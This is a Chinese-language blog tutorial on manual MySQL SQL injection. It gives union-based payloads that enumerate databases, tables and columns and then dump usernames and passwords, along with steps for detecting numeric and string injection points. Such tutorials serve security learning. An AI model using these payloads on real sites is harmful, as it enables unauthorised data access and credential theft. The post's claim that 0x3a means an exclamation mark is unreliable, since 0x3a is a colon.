SQL注入的简单认识

Posted 2020-11-23 ch42e

写在前面

mysql5.0之后的版本，默认在数据库中存放一个information_schema的数据库，其中应该记住里面的三个表SCHEMATA、TABLES、COLUMNS

SCHEMATA表：存储该用户创建的所有数据库的库名，该表中记录数据库名的字段名为：SCHEMA_NAME

TABLES表：存储该用户创建的所有数据库的库名和表名，该表中记录数据库库名和表名的宇段名分别为：TABLE SCHEMA和TABLE_NAME

COLUMNS表：存储该用户创建的所有数据库的库名、表名和字段名，该表中记录数据库库名、表名和宇段名的字段名为：TABLE SCHEMA、 TABLE NAME和COLUMN NAME

几个函数

• database()：当前网站使用的数据库

• version()：当前MySQL的版本
• user()：当前MySQL的用户
• concat()：将多个字符串连接成一个字符串（语法：concat(str1, str2,...)）

• group_concat()：将group by产生的同一个分组中的值连接起来，返回一个字符串结果

几种查询

操作系统信息：

select @@global.version_compile_os from mysql.user

数据库权限：

and ord(mid(user(),1,1))=114  -- 返回正常说明为root

什么是SQL注入

应用程序在向后台数据库传递SQL（结构化查询语句）查询时，如果为攻击者提供了影响该查询的功能，就会引发SQL注入。攻击者通过影响传递给数据库的内容来修改SQL自身的语法和功能，并且会影响SQL所支持数据库和操作系统的功能和灵活性。

可结合试题案例加以理解：https://ne2ha.top/passages/SQLi-Labs-Practice/

数字型注入

即输入的参数为数字型

• 测试是否存在注入点

以一条SQL查询语句为例：

select * from users where id = 1

上面是正常的一条语句，但是如果攻击者通过构造：id=1‘，执行下面的语句：

select * from users where id = 1'

这样的SQL语句是错误的，所以执行SQL查询就会报错，返回异常

接着构造：

select * from users where id = 1 and 1=1

SQL语句正常执行，返回正确

然后：

select * from users where id = 1 and 1=2

语句正常执行，但1=2为恒假条件，无法查询出结果，返回异常

满足上面的3点，大概就可以判断存在数字型注入

---

• 判断字段数

select * from users where id = 1 order by <数字> -- 后面直接加数字，多个字段排序

比如URL：http://example.com/?id=1 存在数字型输入

构造一：http://example.com/?id=1 order by 9--+ 返回错误

构造二：http://example.com/?id=1 order by 8--+ 返回正确

所以可以得到字段数为8

• 查找可显示的字段

http://example.com/?id=1 and 1=2 union select 1,2,3,4,5,6,7,8--+

• 收集信息(假设第6个可以显示数据)

and 1=2 union select 1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8-–+

查询当前使用的用户以及数据库名字和版本

• 查询所有数据库名

and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+schema_name)),7,8 from information_schema.schemata--+

• 爆表

and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+table_name)),7,8 from information_schema.tables where table_schema=0x<数据库名的十六进制>--+

• 爆字段

and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+column_name)),7,8 from information_schema.columns where table_name=0x<字段的十六进制>--+

• 爆字段内容

and 1 =2 union select 1,2,3,4,5,concat(id,0x3a,username,0x3a,password),7,8 from <表名> limit 0,1–-+

说明：id，username，password均假设是上述获取到的字段名,0x3a表示感叹号，具体按实际情况来

字符型注入

即输入的参数为字符型，于数字型的区别在于字符型的参数需要单引号闭合

select * from users where username = 'admin'

• 测试是否存在注入点

加单引号，执行语句

select * from users where username = 'admin''

语句无法执行，返回异常

加上‘and 1=1，执行语句

select * from users where username = 'admin' and 1=1'

语句同样是错误的，注释掉后面的单引号

select * from users where username = 'admin' and 1=1-- '

返回结果正常

接着构造：

select * from users where username = 'admin' and 1=2-- '

返回异常

满足上面3点，大概可以判断存在字符型注入

参考

《SQL注入攻击防御》（第二版）

《Web安全攻防：渗透测试实战指南》

https://www.lstazl.com/mysql数字型手工注入/

https://www.cnblogs.com/aq-ry/p/9368619.html